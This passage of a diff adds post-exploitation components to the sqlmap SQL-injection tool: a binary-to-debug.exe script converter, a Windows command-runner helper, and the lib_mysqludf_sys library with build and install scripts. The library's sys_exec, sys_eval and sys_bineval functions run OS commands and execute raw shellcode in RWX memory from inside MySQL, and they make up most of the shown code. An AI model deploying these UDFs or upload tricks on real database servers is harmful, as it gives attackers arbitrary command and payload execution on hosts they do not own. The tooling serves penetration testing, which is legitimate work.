+    script    += "%x\r\nf 0100 ffff 00\r\n" % fileSize
+    scrString  = ""
+    counter    = 256
+    counter2   = 0
+
+    fp          = open(inputFile, 'rb')
+    fileContent = fp.read()
+
+    for fileChar in fileContent:
+        unsignedFileChar = struct.unpack('B', fileChar)[0]
+
+        if unsignedFileChar != 0:
+            counter2 += 1
+
+            if not scrString:
+                scrString  = "e %0x %02x" % (counter, unsignedFileChar)
+            else:
+                scrString += " %02x" % unsignedFileChar
+        elif scrString:
+            script   += "%s\r\n" % scrString
+            scrString = ""
+            counter2  = 0
+
+        counter += 1
+
+        if counter2 == 20:
+            script    += "%s\r\n" % scrString
+            scrString  = ""
+            counter2   = 0
+
+    script += "w\r\nq\r\n"
+
+    return script
+        
+def main(inputFile, outputFile):
+    if not os.path.isfile(inputFile):
+        print 'ERROR: the provided input file \'%s\' is not a regular file' % inputFile
+        sys.exit(1)
+
+    script = convert(inputFile)
+
+    if outputFile:
+        fpOut      = open(outputFile, 'w')
+        sys.stdout = fpOut
+        sys.stdout.write(script)
+        sys.stdout.close()
+    else:
+        print script
+        
+if __name__ == '__main__':
+    usage = '%s -i <input file> [-o <output file>]' % sys.argv[0]
+    parser  = OptionParser(usage=usage, version='0.1')
+
+    try:
+        parser.add_option('-i', dest='inputFile', help='Input binary file')
+
+        parser.add_option('-o', dest='outputFile', help='Output debug.exe text file')
+
+        (args, _) = parser.parse_args()
+
+        if not args.inputFile:
+            parser.error('Missing the input file, -h for help')
+
+    except (OptionError, TypeError), e:
+        parser.error(e)
+
+    inputFile  = args.inputFile
+    outputFile = args.outputFile
+
+    main(inputFile, outputFile)
--- a/extra/msfauxmod/README.txt
+++ b/extra/msfauxmod/README.txt
@@ -2,10 +2,9 @@ To use Metasploit's sqlmap auxiliary module launch msfconsole and follow
 the example below.

 Note that if you are willing to run Metasploit's sqlmap auxiliary module on
-Metasploit Framework 3.0 or 3.1 you first need to copy wmap_sqlmap.rb to
-your <msf3 root path>/modules/auxiliary/scanner/http/ folder then launch
-msfconsole because this module has been officially integrated in Metasploit
-from the release 3.2.
+through WMAP framework you first need to install sqlmap on your system or
+add its file system path to the PATH environment variable.
+

 $ ./msfconsole

--- a/extra/runcmd/README.txt
+++ b/extra/runcmd/README.txt
@@ -0,0 +1,7 @@
+Files in this folder can be used to compile auxiliary program that can
+be used for running command prompt commands skipping standard "cmd /c" way. 
+They are licensed under the terms of the GNU Lesser General Public License 
+and it's compiled version is available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
--- a/extra/runcmd/windows/README.txt
+++ b/extra/runcmd/windows/README.txt
@@ -0,0 +1,4 @@
+Compile only the Release version because the Runtime library option
+(Project Properties -> Configuration Properties -> C/C++ -> Code
+Generation) is set to "Multi-threaded (/MT)", which statically links
+everything into executable and doesn't compile Debug version at all.
--- a/extra/runcmd/windows/runcmd.sln
+++ b/extra/runcmd/windows/runcmd.sln
@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
--- a/extra/runcmd/windows/runcmd/runcmd.cpp
+++ b/extra/runcmd/windows/runcmd/runcmd.cpp
@@ -0,0 +1,46 @@
+/* 
+	runcmd - a program for running command prompt commands
+	Copyright (C) 2010 Miroslav Stampar
+	email: miroslav.stampar@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <use_ansi.h>
+#include "stdafx.h"
+#include <string>
+
+using namespace std;
+int main(int argc, char* argv[])
+{
+  FILE *fp;
+  string cmd;
+
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);
+
+  fp = _popen(cmd.c_str(), "r");
+
+  if (fp != NULL) {
+    char buffer[BUFSIZ];
+
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
+      fputs(buffer, stdout);
+  }
+
+  return 0;
+}
--- a/extra/runcmd/windows/runcmd/runcmd.vcproj
+++ b/extra/runcmd/windows/runcmd/runcmd.vcproj
@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="windows-1250"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="runcmd"
+	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+	RootNamespace="runcmd"
+	Keyword="Win32Proj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\runcmd.cpp"
+				>
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp"
+				>
+				<FileConfiguration
+					Name="Debug|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\stdafx.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>
--- a/extra/runcmd/windows/runcmd/stdafx.cpp
+++ b/extra/runcmd/windows/runcmd/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// runcmd.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
--- a/extra/runcmd/windows/runcmd/stdafx.h
+++ b/extra/runcmd/windows/runcmd/stdafx.h
@@ -0,0 +1,17 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#endif						
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here
--- a/extra/udfhack/README.txt
+++ b/extra/udfhack/README.txt
@@ -0,0 +1,7 @@
+Files in this folder can be used to compile shared objects that define
+some user-defined functions for MySQL and PostgreSQL. They are licensed
+under the terms of the GNU Lesser General Public License and their
+compiled versions are available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/
--- a/extra/udfhack/linux/README.txt
+++ b/extra/udfhack/linux/README.txt
@@ -0,0 +1,22 @@
+Before compiling, you need to adapt the following to your environment:
+
+Variables in install.sh script:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+USER                    Database management system administrative username
+PORT                    Database management system port
+VERSION                 Database management system version (PostgreSQL only)
+
+Variable in Makefile (MySQL only):
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+LIBDIR                  Database management system absolute file system
+                        path for third party libraries
+
+Then you can launch './install.sh' if you want to compile the shared
+object from the source code and create the user-defined functions on the
+database management system.
+If you only want to compile the shared object, you need to call only the
+'make' command.
--- a/extra/udfhack/linux/lib_mysqludf_sys/Makefile
+++ b/extra/udfhack/linux/lib_mysqludf_sys/Makefile
@@ -0,0 +1,9 @@
+# For MySQL < 5.1
+LIBDIR=/usr/lib
+# For MySQL >= 5.1
+#LIBDIR=/usr/lib/mysql/plugin
+
+install:
+	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
+	strip -sx lib_mysqludf_sys.so
+	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so
--- a/extra/udfhack/linux/lib_mysqludf_sys/install.sh
+++ b/extra/udfhack/linux/lib_mysqludf_sys/install.sh
@@ -0,0 +1,47 @@
+#!/bin/bash
+# lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
+# Copyright (C) 2007  Roland Bouman 
+# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
+# web: http://www.mysqludf.org/
+# email: mysqludfs@gmail.com, bernardo.damele@gmail.com
+# 
+# This library is free software; you can redistribute it and/or
+# modify it under the terms of the GNU Lesser General Public
+# License as published by the Free Software Foundation; either
+# version 2.1 of the License, or (at your option) any later version.
+# 
+# This library is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# Lesser General Public License for more details.
+# 
+# You should have received a copy of the GNU Lesser General Public
+# License along with this library; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+
+# Adapt the following settings to your environment
+USER="root"
+PORT="3306"
+
+echo "Compiling the MySQL UDF"
+make
+
+if test $? -ne 0; then
+	echo "ERROR: You need libmysqlclient development software installed"
+	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
+	echo "apt-get install libmysqlclient-dev"
+	exit 1
+else
+	echo "MySQL UDF compiled successfully"
+fi
+
+echo -e "\nPlease provide your MySQL root password"
+
+mysql -u ${USER} -P ${PORT} -p mysql < lib_mysqludf_sys.sql
+
+if test $? -ne 0; then
+	echo "ERROR: unable to install the UDF"
+	exit 1
+else
+	echo "MySQL UDF installed successfully"
+fi
--- a/extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c
+++ b/extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c
@@ -0,0 +1,551 @@
+/* 
+	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
+	Copyright (C) 2007  Roland Bouman 
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
+	web: http://www.mysqludf.org/
+	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
+	
+	This library is free software; you can redistribute it and/or
+	modify it under the terms of the GNU Lesser General Public
+	License as published by the Free Software Foundation; either
+	version 2.1 of the License, or (at your option) any later version.
+	
+	This library is distributed in the hope that it will be useful,
+	but WITHOUT ANY WARRANTY; without even the implied warranty of
+	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+	Lesser General Public License for more details.
+	
+	You should have received a copy of the GNU Lesser General Public
+	License along with this library; if not, write to the Free Software
+	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+#define DLLEXP __declspec(dllexport) 
+#else
+#define DLLEXP
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+#endif
+
+#ifdef STANDARD
+#include <string.h>
+#include <stdlib.h>
+#include <time.h>
+#ifdef __WIN__
+typedef unsigned __int64 ulonglong;
+typedef __int64 longlong;
+#else
+typedef unsigned long long ulonglong;
+typedef long long longlong;
+#endif /*__WIN__*/
+#else
+#include <my_global.h>
+#include <my_sys.h>
+#endif
+#include <mysql.h>
+#include <m_ctype.h>
+#include <m_string.h>
+#include <stdlib.h>
+
+#include <ctype.h>
+
+#ifdef HAVE_DLOPEN
+#ifdef	__cplusplus
+extern "C" {
+#endif
+
+#define LIBVERSION "lib_mysqludf_sys version 0.0.3"
+
+#ifdef __WIN__
+#define SETENV(name,value)		SetEnvironmentVariable(name,value);
+#else
+#define SETENV(name,value)		setenv(name,value,1);		
+#endif
+
+DLLEXP 
+my_bool lib_mysqludf_sys_info_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void lib_mysqludf_sys_info_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* lib_mysqludf_sys_info(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_get
+ * 
+ * Gets the value of the specified environment variable.
+ */
+DLLEXP 
+my_bool sys_get_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_get_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* sys_get(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_set
+ * 
+ * Sets the value of the environment variables.
+ * This function accepts a set of name/value pairs
+ * which are then set as environment variables.
+ * Use sys_get to retrieve the value of such a variable 
+ */
+DLLEXP 
+my_bool sys_set_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_set_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+long long sys_set(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_exec
+ * 
+ * executes the argument commandstring and returns its exit status.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_exec_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_exec_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+my_ulonglong sys_exec(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_eval
+ * 
+ * executes the argument commandstring and returns its standard output.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_eval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+);
+
+DLLEXP 
+void sys_eval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+char* sys_eval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+);
+
+/**
+ * sys_bineval
+ * 
+ * executes bynary opcodes.
+ * Beware that this can be a security hazard.
+ */
+DLLEXP 
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+DLLEXP 
+void sys_bineval_deinit(
+	UDF_INIT *initid
+);
+
+DLLEXP 
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+);
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter);
+#endif
+
+
+#ifdef	__cplusplus
+}
+#endif
+
+/**
+ * lib_mysqludf_sys_info
+ */
+my_bool lib_mysqludf_sys_info_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	my_bool status;
+	if(args->arg_count!=0){
+		strcpy(
+			message
+		,	"No arguments allowed (udf: lib_mysqludf_sys_info)"
+		);
+		status = 1;
+	} else {
+		status = 0;
+	}
+	return status;
+}
+
+void lib_mysqludf_sys_info_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* lib_mysqludf_sys_info(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	strcpy(result,LIBVERSION);
+	*length = strlen(LIBVERSION);
+	return result;
+}
+
+my_bool sys_get_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	if(args->arg_count==1
+	&&	args->arg_type[0]==STRING_RESULT){
+		initid->maybe_null = 1;
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_get_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* sys_get(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	char* value = getenv(args->args[0]);
+	if(value == NULL){
+		*is_null = 1;
+	} else {
+		*length = strlen(value);
+	} 
+	return value;
+}
+
+my_bool sys_set_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	if(args->arg_count!=2){
+		strcpy(
+			message
+		,	"Expected exactly two arguments"
+		);		
+		return 1;
+	}
+	if(args->arg_type[0]!=STRING_RESULT){
+		strcpy(
+			message
+		,	"Expected string type for name parameter"
+		);		
+		return 1;
+	}
+	args->arg_type[1]=STRING_RESULT;
+	if((initid->ptr=malloc(
+		args->lengths[0]
+	+	1
+	+	args->lengths[1]
+	+	1
+	))==NULL){
+		strcpy(
+			message
+		,	"Could not allocate memory"
+		);		
+		return 1;
+	}	
+	return 0;
+}
+
+void sys_set_deinit(
+	UDF_INIT *initid
+){
+	if (initid->ptr!=NULL){
+		free(initid->ptr);
+	}
+}
+
+long long sys_set(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+){	
+	char *name = initid->ptr;
+	char *value = name + args->lengths[0] + 1; 
+	memcpy(
+		name
+	,	args->args[0]
+	,	args->lengths[0]
+	);
+	*(name + args->lengths[0]) = '\0';
+	memcpy(
+		value
+	,	args->args[1]
+	,	args->lengths[1]
+	);
+	*(value + args->lengths[1]) = '\0';
+	return SETENV(name,value);		
+}
+
+my_bool sys_exec_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	unsigned int i=0;
+	if(args->arg_count == 1
+	&& args->arg_type[i]==STRING_RESULT){
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_exec_deinit(
+	UDF_INIT *initid
+){
+}
+
+my_ulonglong sys_exec(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *is_null
+,	char *error
+){
+	return system(args->args[0]);
+}
+
+my_bool sys_eval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char *message
+){
+	unsigned int i=0;
+	if(args->arg_count == 1
+	&& args->arg_type[i]==STRING_RESULT){
+		return 0;
+	} else {
+		strcpy(
+			message
+		,	"Expected exactly one string type parameter"
+		);		
+		return 1;
+	}
+}
+
+void sys_eval_deinit(
+	UDF_INIT *initid
+){
+}
+
+char* sys_eval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+,	char* result
+,	unsigned long* length
+,	char *is_null
+,	char *error
+){
+	FILE *pipe;
+	char line[1024];
+	unsigned long outlen, linelen;
+
+	result = malloc(1);
+	outlen = 0;
+
+	pipe = popen(args->args[0], "r");
+
+	while (fgets(line, sizeof(line), pipe) != NULL) {
+		linelen = strlen(line);
+		result = realloc(result, outlen + linelen);
+		strncpy(result + outlen, line, linelen);
+		outlen = outlen + linelen;
+	}
+
+	pclose(pipe);
+
+	if (!(*result) || result == NULL) {
+		*is_null = 1;
+	} else {
+		result[outlen-1] = 0x00;
+		*length = strlen(result);
+	}
+
+	return result;
+}
+
+my_bool sys_bineval_init(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	return 0;
+}
+
+void sys_bineval_deinit(
+	UDF_INIT *initid
+){
+	
+}
+
+int sys_bineval(
+	UDF_INIT *initid
+,	UDF_ARGS *args
+){
+	int32 argv0_size;
+	size_t len;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	int pID;
+	char *code;
+#else
+	int *addr;
+	size_t page_size;
+	pid_t pID;
+#endif
+
+	argv0_size = strlen(args->args[0]);
+	len = (size_t)argv0_size;
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+	// allocate a +rwx memory page
+	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+	strncpy(code, args->args[0], len);
+
+	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
+#else
+	pID = fork();
+	if(pID<0)
+		return 1;
+
+	if(pID==0)
+	{
+		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
+		page_size = (len+page_size) & ~(page_size);		// align to page boundary
+
+		// mmap an rwx memory page
+		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
+
+		if (addr == MAP_FAILED)
+			return 1;
+
+		strncpy((char *)addr, args->args[0], len);
+
+		((void (*)(void))addr)();
+	}
+
+	if(pID>0)
+		waitpid(pID, 0, WNOHANG);
+#endif
+
+	return 0;
+}
+
+#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
+DWORD WINAPI exec_payload(LPVOID lpParameter)
+{
+	__try
+	{
+		__asm
+		{
+			mov eax, [lpParameter]
+			call eax
+		}
+	}
+	__except(EXCEPTION_EXECUTE_HANDLER)
+	{
+
+	}
+
+	return 0;
+}
+#endif
+
+#endif /* HAVE_DLOPEN */
--- a/extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql
+++ b/extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql
@@ -0,0 +1,35 @@
+/*
+        lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
+        Copyright (C) 2007  Roland Bouman
+        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
+        web: http://www.mysqludf.org/
+        email: roland.bouman@gmail.com, bernardo.damele@gmail.com
+
+        This library is free software; you can redistribute it and/or
+        modify it under the terms of the GNU Lesser General Public
+        License as published by the Free Software Foundation; either
+        version 2.1 of the License, or (at your option) any later version.
+
+        This library is distributed in the hope that it will be useful,
+        but WITHOUT ANY WARRANTY; without even the implied warranty of
+        MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+        Lesser General Public License for more details.
+
+        You should have received a copy of the GNU Lesser General Public
+        License along with this library; if not, write to the Free Software
+        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+*/
+
+DROP FUNCTION IF EXISTS lib_mysqludf_sys_info;
+DROP FUNCTION IF EXISTS sys_get;
+DROP FUNCTION IF EXISTS sys_set;
+DROP FUNCTION IF EXISTS sys_exec;
+DROP FUNCTION IF EXISTS sys_eval;
+DROP FUNCTION IF EXISTS sys_bineval;
+
+CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
+CREATE FUNCTION sys_bineval RETURNS int SONAME 'lib_mysqludf_sys.so';
--- a/extra/udfhack/linux/lib_postgresqludf_sys/Makefile
+++ b/extra/udfhack/linux/lib_postgresqludf_sys/Makefile
@@ -0,0 +1,16 @@
+LIBDIR=/tmp
+
+8.4:
+	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.3:
+	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.2:
+	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
--- a/extra/udfhack/linux/lib_postgresqludf_sys/install.sh
+++ b/extra/udfhack/linux/lib_postgresqludf_sys/install.sh
@@ -0,0 +1,59 @@
+#!/bin/bash
+# lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
+# Copyright (C) 2009-2010  Bernardo Damele A. G.
+# web: http://bernardodamele.blogspot.com/
+# email: bernardo.damele@gmail.com
+# 
+# This library is free software; you can redistribute it and/or
+# modify it under the terms of the GNU Lesser General Public
+# License as published by the Free Software Foundation; either
+# version 2.1 of the License, or (at your option) any later version.
+# 
+# This library is distributed in the hope that it will be useful,
